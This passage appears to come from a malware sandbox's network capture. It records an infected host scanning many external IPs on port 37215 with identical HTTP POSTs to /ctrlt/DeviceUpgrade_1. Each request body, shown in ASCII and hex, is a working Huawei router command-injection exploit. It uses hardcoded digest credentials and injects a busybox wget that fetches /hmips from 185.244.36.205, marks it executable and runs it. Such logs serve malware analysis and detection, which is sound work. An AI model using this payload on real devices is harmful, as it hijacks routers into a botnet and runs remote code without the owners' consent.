                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              880192.168.2.1556428121.64.227.20837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538686037 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              881192.168.2.1540210157.255.236.17937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538710117 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              882192.168.2.155861894.193.134.23137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538711071 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              883192.168.2.1542560190.0.50.14237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538743019 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              884192.168.2.155838294.242.211.16237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538744926 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              885192.168.2.1538734121.120.226.18937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538759947 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              886192.168.2.1532968102.75.214.3537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538798094 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              887192.168.2.155449831.128.33.7237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538800001 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              888192.168.2.1557800102.251.200.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538831949 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              889192.168.2.1537834197.60.75.25437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538834095 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              890192.168.2.1554716197.117.231.6137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538863897 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
